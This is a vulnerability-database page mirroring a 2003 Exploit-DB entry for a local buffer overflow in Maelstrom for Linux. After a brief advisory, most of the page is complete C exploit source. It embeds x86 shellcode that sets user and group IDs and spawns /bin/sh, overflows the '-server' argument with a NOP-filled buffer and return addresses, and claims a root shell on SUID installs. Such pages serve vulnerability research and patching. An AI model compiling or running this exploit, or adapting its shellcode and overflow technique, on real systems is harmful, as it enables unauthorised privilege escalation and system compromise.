Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Maelstrom Server 3.0.x - Argument Buffer Overflow (2)

🗓️ 23 May 2003 00:00:00Reported by ph4nt0mType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 22 Views

Maelstrom Server 3.0.x has a buffer overflow vulnerability allowing execution of arbitrary code.

Code
// source: https://www.securityfocus.com/bid/7630/info
 
Maelstrom for Linux has been reported prone to a buffer overflow vulnerability.
 
The issue is reportedly due to a lack of sufficient bounds checking performed on user-supplied data before it is copied into an internal memory space. It may be possible for a local attacker to exploit this condition and have malicious arbitrary code executed in the context of the Maelstrom application. Typically setGID games. 

/*  /usr/bin/Maelstrom local exploit
*** Sorry for my poor english.
*** Others exploit can't exploit my Maelstrom,So I
wrote this exploit just for fun.
*** I can't get a rootshell on my linux ,because it's
not SUID.
*** If it SUID ,this exploit can make you get a rootshell.
*** Tested on redhat9.0 ,other linux maybe OK,too.
***
*** Thanks netric's good paper.
*** You can downlocd it here
http://www.netric.org/papers/envpaper.pdf
*** This paper make me write this exploit don't need to
guess ret.
*** Thanks jsk and axis for their help.
***
*** CONTACT:[email protected]
*** COPYRIGHT (c) 2003 PH4NT0M SECURITY
*** http://www.ph4nt0m.net
*** 2003.5.23

Coded by OYXin(ph4nt0m)
Welcome to http://www.ph4nt0m.net

*/
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>

#define  bufsize 8179

/*  linux x86 shellcode by bob from dtors.net,23
bytes,thx them.  */
static char shellcode[] =



   "\x31\xdb"
    "\x89\xd8"
    "\xb0\x17"
    "\xcd\x80"
    "\x31\xdb"
    "\x89\xd8"
    "\xb0\x17"
    "\xcd\x80"
    "\x31\xdb"
    "\x89\xd8"
    "\xb0\x2e"
    "\xcd\x80"
    "\x31\xc0"
    "\x50"
    "\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x62\x69\x6e"
    "\x89\xe3"
    "\x50"
    "\x53"
    "\x89\xe1"
    "\x31\xd2"
    "\xb0\x0b"
    "\xcd\x80"
     "\x31\xdb"
    "\x89\xd8"
    "\xb0\x01"
    "\xcd\x80";

int main(int argc,char *argv[]){
    char buf[bufsize+1];
    char*prog[]={"/usr/bin/Maelstrom","-server",buf,NULL};
    char  *env[]={"HOME=/root",shellcode,NULL};
    unsigned long ret;


    ret=0xc0000000-sizeof(void*)-strlen(prog[0])-strlen(shellcode)-0x02;

    memset(buf, 0x90, bufsize);
    memset(buf,0x32,sizeof("1"));
    memset(buf+1,0x40,sizeof("1"));
    memcpy(&buf[bufsize-(sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(2*sizeof(ret))], &ret,sizeof(ret));

    memcpy(&buf[bufsize-(3*sizeof(ret))], &ret,sizeof(ret));

    memcpy(&buf[bufsize-(4*sizeof(ret))], &ret,sizeof(ret));
    buf[bufsize] = '\0';

    execve(prog[0],prog,env);

    return  0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 May 2003 00:00Current
7.4High risk
Vulners AI Score7.4
maelstrom serverbuffer overflowvulnerabilityarbitrary codelocal attackerexploitationlinux shellcode
22